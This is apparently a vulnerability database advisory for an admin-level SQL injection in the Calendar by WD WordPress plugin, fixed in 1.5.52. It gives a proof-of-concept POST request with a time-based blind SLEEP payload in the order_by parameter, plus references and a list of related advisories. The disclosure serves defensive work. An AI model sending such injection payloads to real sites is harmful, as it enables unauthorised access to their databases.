Calendar by WD < 1.5.52 – Admin+ SQL injection | Plugin Vulnerabilities

Description

The plugin does not validate and properly escape the order_by parameter before using it in a SQL statement when searching events in the admin dashboard, leading to an SQL injection

Proof of Concept

Vulnerable POST URL:
http://www.vulnerablesite.com/wpadmin/admin.php?page=SpiderCalendar&task=show_manage_event&calendar_id=1

Vulnerable POST Body:
search_events_by_title=a&startdate=2011-11-11&enddate=2017-11-
11&page_number=1&serch_or_not=search&id_for_playlist=&asc_or_desc=&order_by=date AND (SELECT * FROM (SELECT(SLEEP(5)))x)

Affects Plugins

spider-event-calendar

Fixed in 1.5.52

References

URL

https://www.defensecode.com/advisories/DC-2017-01-017_WordPress_Spider_Event_Calendar_Plugin_Advisory.pdf

URL

https://plugins.trac.wordpress.org/changeset/1632229/spider-event-calendar

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Submitter

Neven Biruski

Submitter website

http://www.defensecode.com

Submitter twitter

https://twitter.com/DefenseCode/

Verified

Yes

WPVDB ID

82a1dacc-3ff6-406c-ab8f-0e373febaea4

Timeline

Publicly Published

2017-05-02 (about 9 years ago)

Added

2017-05-05 (about 9 years ago)

Last Updated

2022-01-13 (about 4 years ago)

Other

Published

Title

Published

2026-02-13

Title

Mail Mint < 1.19.3 - Authenticated (Administrator+) SQL Injection via Multiple API Endpoints

Published

2025-08-15

Title

School Management <= 93.2.0 - Authenticated (Support staff+) SQL Injection

Published

2025-04-05

Title

Broken Link Checker by AIOSEO < 1.2.4 - Authenticated (Contributor+) SQL Injection

Published

2025-01-27

Title

Track Logins <= 1.0 - Admin+ SQL Injection

Published

2023-10-15

Title

History Log by click5 < 1.0.13 - Admin+ Time-Based Blind SQL Injection